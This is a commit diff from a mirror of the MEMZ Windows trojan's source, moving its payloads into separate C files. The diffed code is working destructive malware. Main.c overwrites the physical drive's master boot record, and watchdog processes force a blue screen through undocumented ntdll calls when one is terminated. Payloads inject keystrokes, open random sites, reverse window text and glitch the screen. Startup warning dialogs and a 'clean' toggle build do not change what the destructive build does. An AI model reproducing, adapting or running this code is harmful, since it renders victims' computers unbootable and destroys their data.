mirrors/MEMZ
Archived
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Payloads are now in seperate files

Browse source
This commit is contained in:
Leurak 2017-05-01 16:17:49 +02:00
parent 887e311358
commit 8d4f4901d2
22 changed files with 829 additions and 360 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
WindowsTrojan/Data/genData.py
View file

@ -68,7 +68,7 @@ with open(sys.argv[1], "w") as cf:
cf.write('#include "Data.h"\n')
hf.write("#pragma once\n")
hf.write('#include "../Source/memz.h"\n')
hf.write('#include "../Source/MEMZ.h"\n')
# MBR Binary
with open(MBRCODE, "rb") as inf:

52
WindowsTrojan/Source/MEMZ.h Normal file
View file

@ -0,0 +1,52 @@
#define UNICODE
#include "../Build/Mode.h"
#ifdef CLEAN
// Enable XP styles
#pragma comment(linker,"\"/manifestdependency:type='win32' \
name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
// Window attributes
#define BTNWIDTH 200
#define BTNHEIGHT 30
#define COLUMNS 3
#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS)
#define SPACE 10
#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE
#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32
#endif
//#pragma once
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <psapi.h>
#include <commctrl.h>
#include "../Build/Data.h"
#include "Payloads/Payloads.h"
void start();
int random();
void strReverseW(LPWSTR str);
PAYLOADHOST(payloadHostDefault);
PAYLOADHOST(payloadHostVisual);
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
#ifndef CLEAN
void killWindows();
void killWindowsInstant();
DWORD WINAPI ripMessageThread(LPVOID);
DWORD WINAPI watchdogThread(LPVOID);
#else
DWORD WINAPI keyboardThread(LPVOID lParam);
extern BOOLEAN enablePayloads;
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam);
#endif

378
WindowsTrojan/Source/Main.c Normal file
View file

@ -0,0 +1,378 @@
#include "MEMZ.h"
#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...
HFONT font;
HWND dialog;
#endif
void start() {
#ifndef CLEAN
int argc;
LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
if (argc > 1) {
if (!lstrcmpW(argv[1], L"/watchdog")) {
CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);
WNDCLASSEXA c;
c.cbSize = sizeof(WNDCLASSEXA);
c.lpfnWndProc = WindowProc;
c.lpszClassName = "hax";
c.style = 0;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = 0;
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassExA(&c);
HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
} else {
// Another very ugly formatting
if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
This malware will harm your computer and makes it unusable.\r\n\
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
If you know what this malware does and are using a safe environment to test, \
press Yes to start it.\r\n\r\n\
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {
ExitProcess(0);
}
wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);
GetModuleFileName(NULL, fn, 8192);
for (int i = 0; i < 5; i++)
ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);
SHELLEXECUTEINFO info;
info.cbSize = sizeof(SHELLEXECUTEINFO);
info.lpFile = fn;
info.lpParameters = L"/main";
info.fMask = SEE_MASK_NOCLOSEPROCESS;
info.hwnd = NULL;
info.lpVerb = NULL;
info.lpDirectory = NULL;
info.hInstApp = NULL;
info.nShow = SW_SHOWDEFAULT;
ShellExecuteEx(&info);
SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);
ExitProcess(0);
}
HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
if (drive == INVALID_HANDLE_VALUE)
ExitProcess(2);
unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
// Join the two code parts together
int i = 0;
for (; i < mbrStage1Len; i++)
*(bootcode + i) = *(mbrStage1 + i);
for (i = 0; i < mbrStage2Len; i++)
*(bootcode + i + 0x1fe) = *(mbrStage2 + i);
DWORD wb;
if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
ExitProcess(3);
CloseHandle(drive);
HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if (note == INVALID_HANDLE_VALUE)
ExitProcess(4);
if (!WriteFile(note, Note, NoteLen, &wb, NULL))
ExitProcess(5);
CloseHandle(note);
ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);
for (int p = 0; p < nPayloads; p++) {
Sleep(payloads[p].startDelay);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
}
for (;;) {
Sleep(10000);
}
#else // CLEAN
InitCommonControls();
dialog = NULL;
LOGFONT lf;
GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);
font = CreateFont(lf.lfHeight, lf.lfWidth,
lf.lfEscapement, lf.lfOrientation, lf.lfWeight,
lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,
lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,
lf.lfPitchAndFamily, lf.lfFaceName);
WNDCLASSEXW c;
c.cbSize = sizeof(WNDCLASSEX);
c.lpfnWndProc = WindowProc;
c.lpszClassName = L"MEMZPanel";
c.style = CS_HREDRAW | CS_VREDRAW;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassExW(&c);
RECT rect;
rect.left = 0;
rect.right = WINDOWWIDTH;
rect.top = 0;
rect.bottom = WINDOWHEIGHT;
AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);
mainWindow = CreateWindowExW(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,
50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);
for (int p = 0; p < nPayloads; p++) {
payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,
(p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT,
mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);
SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
//CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
}
SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);
ShowWindow(mainWindow, SW_SHOW);
UpdateWindow(mainWindow);
CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
#endif
}
#ifndef CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == WM_CLOSE || msg == WM_ENDSESSION) {
killWindows();
return 0;
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
DWORD WINAPI watchdogThread(LPVOID parameter) {
int oproc = 0;
char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);
Sleep(1000);
for (;;) {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
PROCESSENTRY32 proc;
proc.dwSize = sizeof(proc);
Process32First(snapshot, &proc);
int nproc = 0;
do {
HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);
char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(hProc, fn2, 512);
if (!lstrcmpA(fn, fn2)) {
nproc++;
}
CloseHandle(hProc);
LocalFree(fn2);
} while (Process32Next(snapshot, &proc));
CloseHandle(snapshot);
if (nproc < oproc) {
killWindows();
}
oproc = nproc;
Sleep(10);
}
}
void killWindows() {
// Show cool MessageBoxes
for (int i = 0; i < 20; i++) {
CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);
Sleep(100);
}
killWindowsInstant();
}
void killWindowsInstant() {
// Try to force BSOD first
// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...
// This isn't even an exploit, it's just an undocumented feature.
HMODULE ntdll = LoadLibraryA("ntdll");
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {
BOOLEAN tmp1; DWORD tmp2;
((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);
((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);
}
// If the computer is still running, do it the normal way
HANDLE token;
TOKEN_PRIVILEGES privileges;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);
privileges.PrivilegeCount = 1;
privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);
// The actual restart
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
}
DWORD WINAPI ripMessageThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxA(NULL, (LPCSTR)KillMessages[random() % KillMessagesLen], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
UnhookWindowsHookEx(hook);
return 0;
}
#else // CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
PAINTSTRUCT ps;
HDC hdc;
if (msg == WM_ACTIVATE) {
if (wParam == NULL)
dialog = NULL;
else
dialog = hwnd;
} else if (msg == WM_DESTROY) {
ExitProcess(0);
} else if (msg == WM_COMMAND) {
if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
for (int p = 0; p < nPayloads; p++) {
if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);
// Most ugly formatting EVER
if (MessageBoxA(hwnd,
"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
Do you still want to enable it?",
"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);
}
}
}
}
} else if (msg == WM_PAINT) {
hdc = BeginPaint(hwnd, &ps);
SelectObject(hdc, font);
LPWSTR str;
LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";
FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,
L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);
TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));
TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);
EndPaint(hwnd, &ps);
} else {
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}
DWORD WINAPI keyboardThread(LPVOID lParam) {
for (;;) {
if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
enablePayloads = !enablePayloads;
if (!enablePayloads) {
RECT rect;
HWND desktop = GetDesktopWindow();
GetWindowRect(desktop, &rect);
RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);
EnumWindows(&CleanWindowsProc, NULL);
} else {
RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);
}
while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
Sleep(100);
}
} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {
if (enablePayloads) {
for (int p = 0; p < nPayloads; p++) {
if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);
}
}
}
}
Sleep(10);
}
return 0;
}
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {
DWORD pid;
if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {
SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return TRUE;
}
#endif

51
WindowsTrojan/Source/Payloads/PayloadCrazyBus.c Normal file
View file

@ -0,0 +1,51 @@
#include "../MEMZ.h"
PAYLOADHOST(payloadCrazyBus) {
PAYLOAD *payload = (PAYLOAD*)parameter;
WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };
HWAVEOUT hwo;
waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);
const int bufsize = 44100 * 30; // 30 Seconds
char *wavedata = (char *)LocalAlloc(0, bufsize);
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
int freq = 0;
for (int i = 0; i < bufsize; i++) {
if (i % (44100 / 4) == 0)
freq = 44100 / ((random() % 4000) + 1000);
wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100);
}
#ifdef CLEAN
waveOutReset(hwo);
#endif
waveOutWrite(hwo, &hdr, sizeof(hdr));
while (!(hdr.dwFlags & WHDR_DONE)
#ifdef CLEAN
&& (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED)
#endif
) {
Sleep(1);
}
#ifdef CLEAN
if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) {
waveOutPause(hwo);
}
} else {
Sleep(10);
}
#endif
}
}

12
WindowsTrojan/Source/Payloads/PayloadCursor.c Normal file
View file

@ -0,0 +1,12 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadCursor) {
PAYLOADHEAD
POINT cursor;
GetCursorPos(&cursor);
SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
out: return 2;
}

19
WindowsTrojan/Source/Payloads/PayloadDrawErrors.c Normal file
View file

@ -0,0 +1,19 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadDrawErrors) {
PAYLOADHEAD
int ix = GetSystemMetrics(SM_CXICON) / 2;
int iy = GetSystemMetrics(SM_CYICON) / 2;
POINT cursor;
GetCursorPos(&cursor);
DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR));
if (random() % (int)(10/(times/500.0+1)+1) == 0) {
DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING));
}
out: return 2;
}

9
WindowsTrojan/Source/Payloads/PayloadExecute.c Normal file
View file

@ -0,0 +1,9 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadExecute) {
PAYLOADHEAD
ShellExecuteA(NULL, "open", (LPCSTR)Sites[random() % SitesLen], NULL, NULL, SW_SHOWDEFAULT);
out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200);
}

9
WindowsTrojan/Source/Payloads/PayloadInvert.c Normal file
View file

@ -0,0 +1,9 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadInvertScreen) {
PAYLOADHEAD
BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
out: return 100;
}

13
WindowsTrojan/Source/Payloads/PayloadKeyboard.c Normal file
View file

@ -0,0 +1,13 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadKeyboard) {
PAYLOADHEAD
INPUT input;
input.type = INPUT_KEYBOARD;
input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30;
SendInput(1, &input, sizeof(INPUT));
out: return 300 + (random() % 400);
}

35
WindowsTrojan/Source/Payloads/PayloadMessageBox.c Normal file
View file

@ -0,0 +1,35 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadMessageBox) {
PAYLOADHEAD
CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL);
out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30);
}
DWORD WINAPI messageBoxThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING);
UnhookWindowsHookEx(hook);
return 0;
}
LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HCBT_CREATEWND) {
CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs;
if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
HWND hwnd = (HWND)wParam;
int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx);
int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy);
pcs->x = x;
pcs->y = y;
}
}
return CallNextHookEx(0, nCode, wParam, lParam);
}

22
WindowsTrojan/Source/Payloads/PayloadReverseText.c Normal file
View file

@ -0,0 +1,22 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadReverseText) {
PAYLOADHEAD
EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL);
out: return 50;
}
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192);
if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) {
strReverseW(str);
SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL);
}
GlobalFree(str);
return TRUE;
}

16
WindowsTrojan/Source/Payloads/PayloadScreenGlitches.c Normal file
View file

@ -0,0 +1,16 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadScreenGlitches) {
PAYLOADHEAD
int x1 = random() % (w - 400);
int y1 = random() % (h - 400);
int x2 = random() % (w - 400);
int y2 = random() % (h - 400);
int width = random() % 400;
int height = random() % 400;
BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 3;
}

23
WindowsTrojan/Source/Payloads/PayloadSound.c Normal file
View file

@ -0,0 +1,23 @@
#include "../MEMZ.h"
const char *sounds[] = {
"SystemHand",
"SystemQuestion",
"SystemExclamation"
};
PAYLOADFUNCTIONDEFAULT(payloadWindowsSounds) {
PAYLOADHEAD
// There seems to be a bug where toggling ALL payloads kills the sound output on some systems.
// I don't know why this happens, but using SND_SYNC seems to fix the bug.
// But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload.
// As this only happens for the enable-disable part, I will only include that in the clean build as a workaround.
#ifdef CLEAN
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_SYNC);
out: return random() % 10;
#else
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_ASYNC);
out: return 20 + (random() % 20);
#endif
}

9
WindowsTrojan/Source/Payloads/PayloadTunnel.c Normal file
View file

@ -0,0 +1,9 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadTunnel) {
PAYLOADHEAD
StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 4;
}

85
WindowsTrojan/Source/Payloads/Payloads.c Normal file
View file

@ -0,0 +1,85 @@
#include "../MEMZ.h"
PAYLOAD payloads[] = {
Payload(L"Open random websites/programs", payloadHostDefault, (LPVOID)payloadExecute, 30000, FALSE),
Payload(L"Random cursor movement", payloadHostDefault, (LPVOID)payloadCursor, 20000, TRUE),
Payload(L"Random keyboard input", payloadHostDefault, (LPVOID)payloadKeyboard, 20000, FALSE),
Payload(L"Random error sounds", payloadHostDefault, (LPVOID)payloadWindowsSounds, 50000, TRUE),
Payload(L"Invert Screen", payloadHostVisual, (LPVOID)payloadInvertScreen, 30000, TRUE),
Payload(L"Message boxes", payloadHostDefault, (LPVOID)payloadMessageBox, 20000, TRUE),
Payload(L"Draw error icons", payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, TRUE),
Payload(L"Reverse text", payloadHostDefault, (LPVOID)payloadReverseText, 40000, FALSE),
Payload(L"Tunnel effect", payloadHostVisual, (LPVOID)payloadTunnel, 60000, TRUE),
Payload(L"Screen glitches", payloadHostVisual, (LPVOID)payloadScreenGlitches, 15000, TRUE),
Payload(L"Crazy Bus (Ear Rape)", payloadCrazyBus, NULL, 10000, TRUE),
};
const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD);
BOOLEAN enablePayloads = TRUE;
PAYLOADHOST(payloadHostDefault) {
PAYLOAD *payload = (PAYLOAD*)parameter;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE);
#else
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
} else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADHOST(payloadHostVisual) {
PAYLOAD *payload = (PAYLOAD*)parameter;
HWND hwnd = GetDesktopWindow();
HDC hdc = GetWindowDC(hwnd);
RECT rekt;
GetWindowRect(hwnd, &rekt);
int w = rekt.right - rekt.left;
int h = rekt.bottom - rekt.top;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h);
#else
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
}
else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}

54
WindowsTrojan/Source/Payloads/Payloads.h Normal file
View file

@ -0,0 +1,54 @@
#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
typedef struct {
PAYLOADHOST(*payloadHost);
void *payloadFunction;
#ifdef CLEAN
wchar_t *name;
BOOLEAN safe;
HWND btn;
int delaytime, delay, runtime, times;
#else
int startDelay;
int delaytime, delay, runtime, times;
#endif
} PAYLOAD;
#ifdef CLEAN
#define Payload(Name, Host, Function, Delay, Safe) {Host, Function, Name, Safe, 0, 0, 0, 0, 0}
#else
#define Payload(Name, Host, Function, Delay, Safe) {Host, Function, Delay, 0, 0, 0, 0}
#endif
#ifdef CLEAN
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD if (skip) goto out;
#else
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD
#endif
PAYLOADFUNCTIONDEFAULT(payloadExecute);
PAYLOADFUNCTIONDEFAULT(payloadCursor);
PAYLOADFUNCTIONVISUAL(payloadInvertScreen);
PAYLOADFUNCTIONDEFAULT(payloadMessageBox);
PAYLOADFUNCTIONDEFAULT(payloadReverseText);
PAYLOADFUNCTIONDEFAULT(payloadWindowsSounds);
PAYLOADFUNCTIONVISUAL(payloadScreenGlitches);
PAYLOADFUNCTIONDEFAULT(payloadKeyboard);
PAYLOADFUNCTIONVISUAL(payloadTunnel);
PAYLOADFUNCTIONVISUAL(payloadDrawErrors);
PAYLOADHOST(payloadCrazyBus);
// Helper functions
DWORD WINAPI messageBoxThread(LPVOID);
LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM);
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam);
#pragma once
extern PAYLOAD payloads[];
extern const size_t nPayloads;

36
WindowsTrojan/Source/Utils.c Normal file
View file

@ -0,0 +1,36 @@
#include "MEMZ.h"
HCRYPTPROV prov;
int random() {
if (prov == NULL)
if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
ExitProcess(1);
int out;
CryptGenRandom(prov, sizeof(out), (BYTE *)(&out));
return out & 0x7fffffff;
}
void strReverseW(LPWSTR str) {
int len = lstrlenW(str);
if (len <= 1)
return;
WCHAR c;
int i, j;
for (i = 0, j = len - 1; i < j; i++, j--) {
c = str[i];
str[i] = str[j];
str[j] = c;
}
// Fix Newlines
for (i = 0; i < len - 1; i++) {
if (str[i] == L'\n' && str[i + 1] == L'\r') {
str[i] = L'\r';
str[i + 1] = L'\n';
}
}
}

2
WindowsTrojan/Source/main.c
View file

@ -1,4 +1,4 @@
#include "memz.h"
#include "MEMZ.h"
#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...

21
WindowsTrojan/Source/memz.h
View file

@ -18,7 +18,7 @@ processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32
#endif
#pragma once
//#pragma once
#include <windows.h>
#include <tlhelp32.h>
@ -27,7 +27,7 @@ processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#include <commctrl.h>
#include "../Build/Data.h"
#include "payloads.h"
#include "Payloads/Payloads.h"
void start();
@ -49,19 +49,4 @@ DWORD WINAPI watchdogThread(LPVOID);
DWORD WINAPI keyboardThread(LPVOID lParam);
extern BOOLEAN enablePayloads;
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam);
#endif
PAYLOADFUNCTIONDEFAULT(payloadExecute);
PAYLOADFUNCTIONDEFAULT(payloadCursor);
